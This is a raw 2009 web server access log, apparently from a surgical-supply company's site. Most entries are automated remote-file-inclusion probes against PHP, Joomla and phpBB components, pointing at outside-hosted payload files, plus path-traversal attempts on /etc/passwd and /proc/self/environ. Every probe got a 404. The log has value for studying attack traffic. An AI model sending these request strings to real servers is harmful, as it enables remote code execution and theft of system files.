121.15.254.22 - - [19/Jun/2009:04:01:11 -0400] "GET /logs/access_log.Q109060600/lostpasswd.php?env[include_prefix]=http://www.kq-china.com/web//plugins/system/id1.txt? HTTP/1.1" 404 239 "-" "Mozilla/5.0"
121.15.254.22 - - [19/Jun/2009:04:01:39 -0400] "GET /logs/access_log.Q109051700//include/admin.lib.inc.php?site_path=http://www.kq-china.com/web//plugins/system/id1.txt? HTTP/1.1" 404 251 "-" "Mozilla/5.0"
66.249.71.14 - - [19/Jun/2009:04:01:45 -0400] "GET /images/ace_logo_top_over.jpg HTTP/1.1" 304 - "-" "Googlebot-Image/1.0"
119.73.40.49 - - [19/Jun/2009:04:02:01 -0400] "GET /images/login_go.gif HTTP/1.1" 200 296 "http://www.acesurgical.com/home.html" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.20) Gecko/20081217 Firefox/2.0.0.20"
119.73.40.49 - - [19/Jun/2009:04:02:01 -0400] "GET /images/psearch_go.gif HTTP/1.1" 200 296 "http://www.acesurgical.com/home.html" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.20) Gecko/20081217 Firefox/2.0.0.20"
119.73.40.49 - - [19/Jun/2009:04:02:08 -0400] "GET /images/login_go-over.gif HTTP/1.1" 200 302 "http://www.acesurgical.com/home.html" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.20) Gecko/20081217 Firefox/2.0.0.20"
119.73.40.49 - - [19/Jun/2009:04:02:08 -0400] "GET /images/psearch_go-over.gif HTTP/1.1" 200 302 "http://www.acesurgical.com/home.html" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.20) Gecko/20081217 Firefox/2.0.0.20"
119.73.40.49 - - [19/Jun/2009:04:02:12 -0400] "GET /images/login_go-over.gif HTTP/1.1" 200 302 "http://www.acesurgical.com/products.html" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.20) Gecko/20081217 Firefox/2.0.0.20"
119.73.40.49 - - [19/Jun/2009:04:02:12 -0400] "GET /images/psearch_go-over.gif HTTP/1.1" 200 302 "http://www.acesurgical.com/products.html" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.20) Gecko/20081217 Firefox/2.0.0.20"
121.15.254.22 - - [19/Jun/2009:04:02:23 -0400] "GET /logs/access_log.Q109051700//include/admin.lib.inc.php?site_path=http://www.kq-china.com/web//plugins/system/id1.txt? HTTP/1.1" 404 251 "-" "Mozilla/5.0"
121.15.254.22 - - [19/Jun/2009:04:02:37 -0400] "GET /logs/access_log.Q109061200%20%20/lostpasswd.php?env[include_prefix]=http://www.kq-china.com/web//plugins/system/id1.txt? HTTP/1.1" 404 241 "-" "Mozilla/5.0"
121.15.254.22 - - [19/Jun/2009:04:02:49 -0400] "GET /logs/access_log.Q109060600%20%20/lostpasswd.php?env[include_prefix]=http://www.kq-china.com/web//plugins/system/id1.txt? HTTP/1.1" 404 241 "-" "Mozilla/5.0"
203.94.155.59 - - [19/Jun/2009:04:02:57 -0400] "GET /logs//index.php?_REQUEST=&_REQUEST%5boption%5d=com_content&_REQUEST%5bItemid%5d=1&GLOBALS=&mosConfig_absolute_path=http://www.wfc.edu.tw/~ecsec/xxup/news/readme.txt? HTTP/1.1" 404 213 "-" "Mozilla/5.0"
203.94.155.59 - - [19/Jun/2009:04:02:57 -0400] "GET /logs/access_log.Q109053100//index.php?_REQUEST=&_REQUEST%5boption%5d=com_content&_REQUEST%5bItemid%5d=1&GLOBALS=&mosConfig_absolute_path=http://www.wfc.edu.tw/~ecsec/xxup/news/readme.txt? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
203.94.155.59 - - [19/Jun/2009:04:02:57 -0400] "GET //index.php?_REQUEST=&_REQUEST%5boption%5d=com_content&_REQUEST%5bItemid%5d=1&GLOBALS=&mosConfig_absolute_path=http://www.wfc.edu.tw/~ecsec/xxup/news/readme.txt? HTTP/1.1" 404 208 "-" "Mozilla/5.0"
203.94.155.59 - - [19/Jun/2009:04:03:05 -0400] "GET //index.php?_REQUEST=&_REQUEST%5boption%5d=com_content&_REQUEST%5bItemid%5d=1&GLOBALS=&mosConfig_absolute_path=http://www.wfc.edu.tw/~ecsec/xxup/news/readme.txt? HTTP/1.1" 404 208 "-" "Mozilla/5.0"
203.94.155.59 - - [19/Jun/2009:04:03:05 -0400] "GET /logs/access_log.Q109053100//index.php?_REQUEST=&_REQUEST%5boption%5d=com_content&_REQUEST%5bItemid%5d=1&GLOBALS=&mosConfig_absolute_path=http://www.wfc.edu.tw/~ecsec/xxup/news/readme.txt? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
203.94.155.59 - - [19/Jun/2009:04:03:05 -0400] "GET /logs//index.php?_REQUEST=&_REQUEST%5boption%5d=com_content&_REQUEST%5bItemid%5d=1&GLOBALS=&mosConfig_absolute_path=http://www.wfc.edu.tw/~ecsec/xxup/news/readme.txt? HTTP/1.1" 404 213 "-" "Mozilla/5.0"
203.94.155.59 - - [19/Jun/2009:04:03:26 -0400] "GET /logs//index.php?_REQUEST=&_REQUEST%5boption%5d=com_content&_REQUEST%5bItemid%5d=1&GLOBALS=&mosConfig_absolute_path=http://www.wfc.edu.tw/~ecsec/xxup/news/readme.txt? HTTP/1.1" 404 213 "-" "Mozilla/5.0"
203.94.155.59 - - [19/Jun/2009:04:03:26 -0400] "GET //index.php?_REQUEST=&_REQUEST%5boption%5d=com_content&_REQUEST%5bItemid%5d=1&GLOBALS=&mosConfig_absolute_path=http://www.wfc.edu.tw/~ecsec/xxup/news/readme.txt? HTTP/1.1" 404 208 "-" "Mozilla/5.0"
203.94.155.59 - - [19/Jun/2009:04:03:26 -0400] "GET /logs/access_log.Q109053100%20%20//index.php?_REQUEST=&_REQUEST%5boption%5d=com_content&_REQUEST%5bItemid%5d=1&GLOBALS=&mosConfig_absolute_path=http://www.wfc.edu.tw/~ecsec/xxup/news/readme.txt? HTTP/1.1" 404 237 "-" "Mozilla/5.0"
193.34.167.192 - - [19/Jun/2009:04:03:33 -0400] "GET //include/lib.inc.php?site_path=http://glassmac.com/bbs/data/news/style/roscanid.txt??? HTTP/1.1" 404 218 "-" "libwww-perl/5.808"
87.230.22.39 - - [19/Jun/2009:04:04:05 -0400] "GET /logs//PNphpBB2/includes/functions_admin.php?phpbb_root_path=http://kotz.org/images/extras/id.txt??? HTTP/1.1" 404 241 "-" "Mozilla/5.0"
87.230.22.39 - - [19/Jun/2009:04:04:05 -0400] "GET //PNphpBB2/includes/functions_admin.php?phpbb_root_path=http://kotz.org/images/extras/id.txt??? HTTP/1.1" 404 236 "-" "Mozilla/5.0"
87.230.22.39 - - [19/Jun/2009:04:04:05 -0400] "GET /logs/access_log.Q109053100//PNphpBB2/includes/functions_admin.php?phpbb_root_path=http://kotz.org/images/extras/id.txt??? HTTP/1.1" 404 263 "-" "Mozilla/5.0"
87.230.22.39 - - [19/Jun/2009:04:04:09 -0400] "GET /logs/access_log.Q109052200//PNphpBB2/includes/functions_admin.php?phpbb_root_path=http://kotz.org/images/extras/id.txt??? HTTP/1.1" 404 263 "-" "Mozilla/5.0"
87.230.22.39 - - [19/Jun/2009:04:04:23 -0400] "GET //PNphpBB2/includes/functions_admin.php?phpbb_root_path=http://kotz.org/images/extras/id.txt??? HTTP/1.1" 404 236 "-" "Mozilla/5.0"
87.230.22.39 - - [19/Jun/2009:04:04:23 -0400] "GET /logs/access_log.Q109052200%20%20//PNphpBB2/includes/functions_admin.php?phpbb_root_path=http://kotz.org/images/extras/id.txt??? HTTP/1.1" 404 265 "-" "Mozilla/5.0"
87.230.22.39 - - [19/Jun/2009:04:04:23 -0400] "GET /logs//PNphpBB2/includes/functions_admin.php?phpbb_root_path=http://kotz.org/images/extras/id.txt??? HTTP/1.1" 404 241 "-" "Mozilla/5.0"
193.34.167.192 - - [19/Jun/2009:04:04:38 -0400] "GET /logs/access_log.Q109051500/components/com_sitemap/sitemap.php?mosConfig_admin_path=http://glassmac.com/bbs/data/news/style/roscanid.txt?? HTTP/1.1" 404 259 "-" "libwww-perl/5.808"
193.34.167.192 - - [19/Jun/2009:04:04:39 -0400] "GET /components/com_sitemap/sitemap.php?mosConfig_admin_path=http://glassmac.com/bbs/data/news/style/roscanid.txt?? HTTP/1.1" 404 232 "-" "libwww-perl/5.808"
193.34.167.192 - - [19/Jun/2009:04:04:39 -0400] "GET /logs/components/com_sitemap/sitemap.php?mosConfig_admin_path=http://glassmac.com/bbs/data/news/style/roscanid.txt?? HTTP/1.1" 404 237 "-" "libwww-perl/5.808"
193.34.167.192 - - [19/Jun/2009:04:04:41 -0400] "GET /logs/access_log.Q109031800/components/com_sitemap/sitemap.php?mosConfig_admin_path=http://glassmac.com/bbs/data/news/style/roscanid.txt?? HTTP/1.1" 404 259 "-" "libwww-perl/5.808"
87.230.22.39 - - [19/Jun/2009:04:05:01 -0400] "GET /logs/access_log.Q109050700%20%20//PNphpBB2/includes/functions_admin.php?phpbb_root_path=http://kotz.org/images/extras/id.txt??? HTTP/1.1" 404 265 "-" "Mozilla/5.0"
87.230.22.39 - - [19/Jun/2009:04:05:40 -0400] "GET /logs/access_log.Q109052200//PNphpBB2/includes/functions_admin.php?phpbb_root_path=http://kotz.org/images/extras/id.txt??? HTTP/1.1" 404 263 "-" "Mozilla/5.0"
87.230.22.39 - - [19/Jun/2009:04:05:48 -0400] "GET /logs/access_log.Q109050700//PNphpBB2/includes/functions_admin.php?phpbb_root_path=http://kotz.org/images/extras/id.txt??? HTTP/1.1" 404 263 "-" "Mozilla/5.0"
94.23.200.54 - - [19/Jun/2009:04:05:54 -0400] "GET //common/db.php?commonpath=http://rsh.kiev.ua/images/idfx1.txt? HTTP/1.1" 404 212 "-" "Mozilla/5.0"
94.23.200.54 - - [19/Jun/2009:04:05:54 -0400] "GET /logs//common/db.php?commonpath=http://rsh.kiev.ua/images/idfx1.txt? HTTP/1.1" 404 217 "-" "Mozilla/5.0"
94.23.200.54 - - [19/Jun/2009:04:05:54 -0400] "GET /logs/access_log.Q109060100%20%20//common/db.php?commonpath=http://rsh.kiev.ua/images/idfx1.txt? HTTP/1.1" 404 241 "-" "Mozilla/5.0"
94.23.200.54 - - [19/Jun/2009:04:05:54 -0400] "GET /logs/access_log.Q109050800%20%20//common/db.php?commonpath=http://rsh.kiev.ua/images/idfx1.txt? HTTP/1.1" 404 241 "-" "Mozilla/5.0"
121.165.73.157 - - [19/Jun/2009:04:05:54 -0400] "GET /logs/access_log.Q109051800/appserv/main.php?appserv_root=http://closeup2.com/components/sex.txt??? HTTP/1.1" 404 241 "-" "libwww-perl/5.805"
121.165.73.157 - - [19/Jun/2009:04:05:54 -0400] "GET /appserv/main.php?appserv_root=http://closeup2.com/components/sex.txt??? HTTP/1.1" 404 214 "-" "libwww-perl/5.805"
121.165.73.157 - - [19/Jun/2009:04:05:54 -0400] "GET /logs/appserv/main.php?appserv_root=http://closeup2.com/components/sex.txt??? HTTP/1.1" 404 219 "-" "libwww-perl/5.805"
94.23.200.54 - - [19/Jun/2009:04:05:55 -0400] "GET //common/db.php?commonpath=http://rsh.kiev.ua/images/idfx1.txt? HTTP/1.1" 404 212 "-" "Mozilla/5.0"
94.23.200.54 - - [19/Jun/2009:04:05:55 -0400] "GET /logs//common/db.php?commonpath=http://rsh.kiev.ua/images/idfx1.txt? HTTP/1.1" 404 217 "-" "Mozilla/5.0"
94.23.200.54 - - [19/Jun/2009:04:05:55 -0400] "GET /logs/access_log.Q109060100%20%20//common/db.php?commonpath=http://rsh.kiev.ua/images/idfx1.txt? HTTP/1.1" 404 241 "-" "Mozilla/5.0"
94.23.200.54 - - [19/Jun/2009:04:05:55 -0400] "GET /logs/access_log.Q109050800%20%20//common/db.php?commonpath=http://rsh.kiev.ua/images/idfx1.txt? HTTP/1.1" 404 241 "-" "Mozilla/5.0"
74.55.29.146 - - [19/Jun/2009:04:05:56 -0400] "GET /logs/index.php?mosConfig_absolute_path=http://www.die-grenzreiter.com/content/download/fx29id.txt?? HTTP/1.1" 404 212 "-" "Mozilla/5.0"
74.55.29.146 - - [19/Jun/2009:04:05:56 -0400] "GET /logs/access_log.Q109052900%20%20/index.php?mosConfig_absolute_path=http://www.die-grenzreiter.com/content/download/fx29id.txt?? HTTP/1.1" 404 236 "-" "Mozilla/5.0"
74.55.29.146 - - [19/Jun/2009:04:05:56 -0400] "GET /index.php?mosConfig_absolute_path=http://www.die-grenzreiter.com/content/download/fx29id.txt?? HTTP/1.1" 404 207 "-" "Mozilla/5.0"
209.59.12.99 - - [19/Jun/2009:04:06:03 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
121.165.73.157 - - [19/Jun/2009:04:06:24 -0400] "GET /logs/access_log.Q109050700/appserv/main.php?appserv_root=http://closeup2.com/components/sex.txt??? HTTP/1.1" 404 241 "-" "libwww-perl/5.805"
124.217.216.86 - - [19/Jun/2009:04:06:30 -0400] "GET /logs/access_log.Q109051700//include/admin.lib.inc.php?site_path=http://vpk66.ru/images/stories/idd.txt??? HTTP/1.1" 404 251 "-" "libwww-perl/5.826"
211.49.99.7 - - [19/Jun/2009:04:06:39 -0400] "GET /logs/access_log.Q109050300/includes/class_item.php?fileExtension=http://dwno.or.kr/bbs/zipcode/tes?? HTTP/1.1" 404 248 "-" "Mozilla/5.0"
190.54.28.163 - - [19/Jun/2009:04:07:05 -0400] "GET /logs//tasks-jr/about.php?include=http://www.univers-du-pin.be/buggsbunny?? HTTP/1.1" 404 222 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8) Gecko/20060321 Firefox/2.0a1"
190.54.28.163 - - [19/Jun/2009:04:07:05 -0400] "GET //tasks-jr/about.php?include=http://www.univers-du-pin.be/buggsbunny?? HTTP/1.1" 404 217 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8) Gecko/20060321 Firefox/2.0a1"
66.11.230.36 - - [19/Jun/2009:04:07:06 -0400] "GET //kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://food114.tv/banner/shirohige/fxid.txt?? HTTP/1.1" 404 209 "-" "Mozilla/5.0"
66.11.230.36 - - [19/Jun/2009:04:07:06 -0400] "GET /logs//kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://food114.tv/banner/shirohige/fxid.txt?? HTTP/1.1" 404 214 "-" "Mozilla/5.0"
66.11.230.36 - - [19/Jun/2009:04:07:06 -0400] "GET /logs/access_log.Q109051600%20%20//kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://food114.tv/banner/shirohige/fxid.txt?? HTTP/1.1" 404 238 "-" "Mozilla/5.0"
190.54.28.163 - - [19/Jun/2009:04:07:10 -0400] "GET /logs/errors.php?error=http://www.univers-du-pin.be/buggsbunny?? HTTP/1.1" 404 213 "-" "Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 5.1)"
190.54.28.163 - - [19/Jun/2009:04:07:10 -0400] "GET /errors.php?error=http://www.univers-du-pin.be/buggsbunny?? HTTP/1.1" 404 208 "-" "Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 5.1)"
66.11.230.36 - - [19/Jun/2009:04:07:11 -0400] "GET /logs/access_log.Q109060900%20%20//kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://food114.tv/banner/shirohige/fxid.txt?? HTTP/1.1" 404 238 "-" "Mozilla/5.0"
190.54.28.163 - - [19/Jun/2009:04:07:15 -0400] "GET /logs//tasks-jr/about.php?include=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ HTTP/1.1" 404 222 "-" "XXXXXX"
190.54.28.163 - - [19/Jun/2009:04:07:15 -0400] "GET //tasks-jr/about.php?include=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ HTTP/1.1" 404 217 "-" "XXXXXX"
190.54.28.163 - - [19/Jun/2009:04:07:20 -0400] "GET /logs//tasks-jr/about.php?include=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 222 "-" "XXXXXX"
190.54.28.163 - - [19/Jun/2009:04:07:20 -0400] "GET //tasks-jr/about.php?include=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 217 "-" "XXXXXX"
94.23.200.54 - - [19/Jun/2009:04:07:33 -0400] "GET /logs/access_log.Q109052200///blog.inc.php?_SERVER[DOCUMENT_ROOT]=http://www.harzer-nachrichten.de///userimages/sub/fx29id1.txt??? HTTP/1.1" 404 239 "-" "Mozilla/5.0"
205.234.232.101 - - [19/Jun/2009:04:07:38 -0400] "GET /logs/access_log.Q109060100//common/db.php?commonpath=../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 239 "-" "libwww-perl/5.812"
205.234.232.101 - - [19/Jun/2009:04:07:39 -0400] "GET //common/db.php?commonpath=../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 212 "-" "libwww-perl/5.812"
205.234.232.101 - - [19/Jun/2009:04:07:39 -0400] "GET /logs//common/db.php?commonpath=../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 217 "-" "libwww-perl/5.812"
205.234.232.101 - - [19/Jun/2009:04:07:43 -0400] "GET /logs/access_log.Q109050800//common/db.php?commonpath=../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 239 "-" "libwww-perl/5.812"
94.23.200.54 - - [19/Jun/2009:04:07:50 -0400] "GET /logs/access_log.Q109061200///blog.inc.php?_SERVER[DOCUMENT_ROOT]=http://www.harzer-nachrichten.de///userimages/sub/fx29id1.txt??? HTTP/1.1" 404 239 "-" "Mozilla/5.0"
91.121.137.51 - - [19/Jun/2009:04:07:51 -0400] "GET //common/db.php?commonpath=http://www.kq-china.com/web//plugins/system/id1.txt?? HTTP/1.1" 404 212 "-" "Mozilla/5.0"
91.121.137.51 - - [19/Jun/2009:04:07:51 -0400] "GET /logs//common/db.php?commonpath=http://www.kq-china.com/web//plugins/system/id1.txt?? HTTP/1.1" 404 217 "-" "Mozilla/5.0"
91.121.137.51 - - [19/Jun/2009:04:07:51 -0400] "GET /logs/access_log.Q109060100%20%20//common/db.php?commonpath=http://www.kq-china.com/web//plugins/system/id1.txt?? HTTP/1.1" 404 241 "-" "Mozilla/5.0"
91.121.137.51 - - [19/Jun/2009:04:07:51 -0400] "GET /logs/access_log.Q109050800%20%20//common/db.php?commonpath=http://www.kq-china.com/web//plugins/system/id1.txt?? HTTP/1.1" 404 241 "-" "Mozilla/5.0"
205.234.232.101 - - [19/Jun/2009:04:07:53 -0400] "GET //common/db.php?commonpath=../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 212 "-" "libwww-perl/5.812"
75.125.245.26 - - [19/Jun/2009:04:08:56 -0400] "GET //PNphpBB2/includes/functions_admin.php?phpbb_root_path=http://www.politicalroundtable.com/plugins/1.gif?? HTTP/1.1" 404 236 "-" "Mozilla/5.0"
75.125.245.26 - - [19/Jun/2009:04:08:56 -0400] "GET /logs/access_log.Q109053100//PNphpBB2/includes/functions_admin.php?phpbb_root_path=http://www.politicalroundtable.com/plugins/1.gif?? HTTP/1.1" 404 263 "-" "Mozilla/5.0"
75.125.245.26 - - [19/Jun/2009:04:08:56 -0400] "GET /logs//PNphpBB2/includes/functions_admin.php?phpbb_root_path=http://www.politicalroundtable.com/plugins/1.gif?? HTTP/1.1" 404 241 "-" "Mozilla/5.0"
75.125.245.26 - - [19/Jun/2009:04:09:01 -0400] "GET /logs/access_log.Q109052200//PNphpBB2/includes/functions_admin.php?phpbb_root_path=http://www.politicalroundtable.com/plugins/1.gif?? HTTP/1.1" 404 263 "-" "Mozilla/5.0"
74.55.29.146 - - [19/Jun/2009:04:09:12 -0400] "GET /logs/access_log.Q109051600%20%20/index.php?mosConfig_absolute_path=http://www.die-grenzreiter.com/content/download/fx29id.txt?? HTTP/1.1" 404 236 "-" "Mozilla/5.0"
193.34.167.192 - - [19/Jun/2009:04:09:52 -0400] "GET /logs/access_log.Q109052200//include/lib.inc.php?site_path=http://glassmac.com/bbs/data/news/style/roscanid.txt?? HTTP/1.1" 404 245 "-" "libwww-perl/5.808"
193.34.167.192 - - [19/Jun/2009:04:09:53 -0400] "GET //include/lib.inc.php?site_path=http://glassmac.com/bbs/data/news/style/roscanid.txt?? HTTP/1.1" 404 218 "-" "libwww-perl/5.808"
193.34.167.192 - - [19/Jun/2009:04:09:53 -0400] "GET /logs//include/lib.inc.php?site_path=http://glassmac.com/bbs/data/news/style/roscanid.txt?? HTTP/1.1" 404 223 "-" "libwww-perl/5.808"
66.249.71.14 - - [19/Jun/2009:04:10:11 -0400] "GET /images/items/45415201_THUMB.JPG HTTP/1.1" 304 - "-" "Googlebot-Image/1.0"
210.202.194.157 - - [19/Jun/2009:04:12:01 -0400] "GET /images/psearch_go.gif HTTP/1.1" 304 - "http://www.acesurgical.com/home.html" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; GTB6; .NET CLR 2.0.50727; InfoPath.1)"
210.202.194.157 - - [19/Jun/2009:04:12:01 -0400] "GET /images/login_go.gif HTTP/1.1" 304 - "http://www.acesurgical.com/home.html" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; GTB6; .NET CLR 2.0.50727; InfoPath.1)"
210.202.194.157 - - [19/Jun/2009:04:12:09 -0400] "GET /images/psearch_go-over.gif HTTP/1.1" 304 - "http://www.acesurgical.com/products.html" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; GTB6; .NET CLR 2.0.50727; InfoPath.1)"
210.202.194.157 - - [19/Jun/2009:04:12:09 -0400] "GET /images/login_go-over.gif HTTP/1.1" 304 - "http://www.acesurgical.com/products.html" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; GTB6; .NET CLR 2.0.50727; InfoPath.1)"
66.249.71.14 - - [19/Jun/2009:04:12:33 -0400] "GET /logs/error_log.Q109021100 HTTP/1.1" 404 223 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
193.34.167.192 - - [19/Jun/2009:04:12:50 -0400] "GET /logs/access_log.Q109050900//include/lib.inc.php?site_path=http://glassmac.com/bbs/data/news/style/roscanid.txt?? HTTP/1.1" 404 245 "-" "libwww-perl/5.808"
200.105.207.244 - - [19/Jun/2009:04:13:07 -0400] "GET //credits.html.php?mosConfig_absolute_path=http://siam2.com/ict/news/photo/.photo/bot/1.swf?? HTTP/1.1" 404 215 "-" "Mozilla/5.0"
200.105.207.244 - - [19/Jun/2009:04:13:07 -0400] "GET /logs//credits.html.php?mosConfig_absolute_path=http://siam2.com/ict/news/photo/.photo/bot/1.swf?? HTTP/1.1" 404 220 "-" "Mozilla/5.0"
200.105.207.244 - - [19/Jun/2009:04:13:07 -0400] "GET /logs/access_log.Q109051500%20%20//credits.html.php?mosConfig_absolute_path=http://siam2.com/ict/news/photo/.photo/bot/1.swf?? HTTP/1.1" 404 244 "-" "Mozilla/5.0"
200.105.207.244 - - [19/Jun/2009:04:13:07 -0400] "GET /logs/access_log.Q109052500%20%20//credits.html.php?mosConfig_absolute_path=http://siam2.com/ict/news/photo/.photo/bot/1.swf?? HTTP/1.1" 404 244 "-" "Mozilla/5.0"
74.6.17.151 - - [19/Jun/2009:04:13:27 -0400] "GET /logs/error_log.Q108082300 HTTP/1.0" 404 223 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)"
209.59.12.99 - - [19/Jun/2009:04:13:38 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
38.99.13.118 - - [19/Jun/2009:04:13:55 -0400] "GET /logs/error_log.Q107070100 HTTP/1.0" 404 223 "-" "Mozilla/5.0 (Twiceler-0.9 http://www.cuil.com/twiceler/robot.html)"
213.33.143.3 - - [19/Jun/2009:04:15:34 -0400] "GET /logs/access_log.Q109010700//component/option,com_registration/task,register/index.php?option=com_registration&Itemid=&mosConfig_absolute_path=http://www.jotka-kommunikation.de/images/rss?? HTTP/1.1" 404 283 "-" "libwww-perl/5.805"
213.33.143.3 - - [19/Jun/2009:04:15:34 -0400] "GET //component/option,com_registration/task,register/index.php?option=com_registration&Itemid=&mosConfig_absolute_path=http://www.jotka-kommunikation.de/images/rss?? HTTP/1.1" 404 256 "-" "libwww-perl/5.805"
213.33.143.3 - - [19/Jun/2009:04:15:34 -0400] "GET /logs//component/option,com_registration/task,register/index.php?option=com_registration&Itemid=&mosConfig_absolute_path=http://www.jotka-kommunikation.de/images/rss?? HTTP/1.1" 404 261 "-" "libwww-perl/5.805"
212.88.179.68 - - [19/Jun/2009:04:15:41 -0400] "GET /logs/access_log.Q109051700/components/com_mtree/Savant2/Savant2_Plugin_stylesheet.php?mosConfig_absolute_path=http://yagami.altervista.org/id.txt? HTTP/1.1" 404 283 "-" "libwww-perl/5.805"
212.88.179.68 - - [19/Jun/2009:04:15:42 -0400] "GET /components/com_mtree/Savant2/Savant2_Plugin_stylesheet.php?mosConfig_absolute_path=http://yagami.altervista.org/id.txt? HTTP/1.1" 404 256 "-" "libwww-perl/5.805"
212.88.179.68 - - [19/Jun/2009:04:15:42 -0400] "GET /logs/components/com_mtree/Savant2/Savant2_Plugin_stylesheet.php?mosConfig_absolute_path=http://yagami.altervista.org/id.txt? HTTP/1.1" 404 261 "-" "libwww-perl/5.805"
87.230.22.39 - - [19/Jun/2009:04:15:47 -0400] "GET //galeria.php?start=0&kategoria=http://kotz.org/images/extras/id.txt??? HTTP/1.1" 404 210 "-" "Mozilla/5.0"
87.230.22.39 - - [19/Jun/2009:04:15:47 -0400] "GET /logs/access_log.Q109051800//galeria.php?start=0&kategoria=http://kotz.org/images/extras/id.txt??? HTTP/1.1" 404 237 "-" "Mozilla/5.0"
87.230.22.39 - - [19/Jun/2009:04:15:47 -0400] "GET /logs//galeria.php?start=0&kategoria=http://kotz.org/images/extras/id.txt??? HTTP/1.1" 404 215 "-" "Mozilla/5.0"
216.120.237.150 - - [19/Jun/2009:04:15:48 -0400] "GET /logs/access_log.Q109010700//component/option,com_registration/task,register/index.php?option=com_registration&Itemid=&mosConfig_absolute_path=http://www.jotka-kommunikation.de/images/rss?? HTTP/1.1" 404 283 "-" "libwww-perl/5.811"
216.120.237.150 - - [19/Jun/2009:04:15:48 -0400] "GET //component/option,com_registration/task,register/index.php?option=com_registration&Itemid=&mosConfig_absolute_path=http://www.jotka-kommunikation.de/images/rss?? HTTP/1.1" 404 256 "-" "libwww-perl/5.811"
216.120.237.150 - - [19/Jun/2009:04:15:48 -0400] "GET /logs//component/option,com_registration/task,register/index.php?option=com_registration&Itemid=&mosConfig_absolute_path=http://www.jotka-kommunikation.de/images/rss?? HTTP/1.1" 404 261 "-" "libwww-perl/5.811"
87.230.22.39 - - [19/Jun/2009:04:15:51 -0400] "GET /logs/access_log.Q109060100//galeria.php?start=0&kategoria=http://kotz.org/images/extras/id.txt??? HTTP/1.1" 404 237 "-" "Mozilla/5.0"
75.125.245.26 - - [19/Jun/2009:04:16:13 -0400] "GET /logs/access_log.Q109051800//galeria.php?start=0&kategoria=http://www.politicalroundtable.com/plugins/1.gif?? HTTP/1.1" 404 237 "-" "Mozilla/5.0"
75.125.245.26 - - [19/Jun/2009:04:16:13 -0400] "GET //galeria.php?start=0&kategoria=http://www.politicalroundtable.com/plugins/1.gif?? HTTP/1.1" 404 210 "-" "Mozilla/5.0"
75.125.245.26 - - [19/Jun/2009:04:16:15 -0400] "GET /logs//galeria.php?start=0&kategoria=http://www.politicalroundtable.com/plugins/1.gif?? HTTP/1.1" 404 215 "-" "Mozilla/5.0"
75.125.245.26 - - [19/Jun/2009:04:16:18 -0400] "GET /logs/access_log.Q109060100//galeria.php?start=0&kategoria=http://www.politicalroundtable.com/plugins/1.gif?? HTTP/1.1" 404 237 "-" "Mozilla/5.0"
94.23.200.54 - - [19/Jun/2009:04:16:50 -0400] "GET /logs/access_log.Q109060100//common/db.php?commonpath=http://rsh.kiev.ua/images/idfx1.txt? HTTP/1.1" 404 239 "-" "Mozilla/5.0"
94.23.200.54 - - [19/Jun/2009:04:16:50 -0400] "GET /logs/access_log.Q109050800//common/db.php?commonpath=http://rsh.kiev.ua/images/idfx1.txt? HTTP/1.1" 404 239 "-" "Mozilla/5.0"
66.249.71.54 - - [19/Jun/2009:04:17:02 -0400] "GET /images/nav_home_temp_over.jpg HTTP/1.1" 200 3329 "-" "Googlebot-Image/1.0"
94.23.200.54 - - [19/Jun/2009:04:17:04 -0400] "GET /logs/access_log.Q109060100//common/db.php?commonpath=http://rsh.kiev.ua/images/idfx1.txt? HTTP/1.1" 404 239 "-" "Mozilla/5.0"
94.23.200.54 - - [19/Jun/2009:04:17:04 -0400] "GET /logs/access_log.Q109050800//common/db.php?commonpath=http://rsh.kiev.ua/images/idfx1.txt? HTTP/1.1" 404 239 "-" "Mozilla/5.0"
75.125.245.26 - - [19/Jun/2009:04:17:50 -0400] "GET //kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://www.politicalroundtable.com/plugins/1.gif?? HTTP/1.1" 404 209 "-" "Mozilla/5.0"
75.125.245.26 - - [19/Jun/2009:04:17:50 -0400] "GET /logs//kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://www.politicalroundtable.com/plugins/1.gif?? HTTP/1.1" 404 214 "-" "Mozilla/5.0"
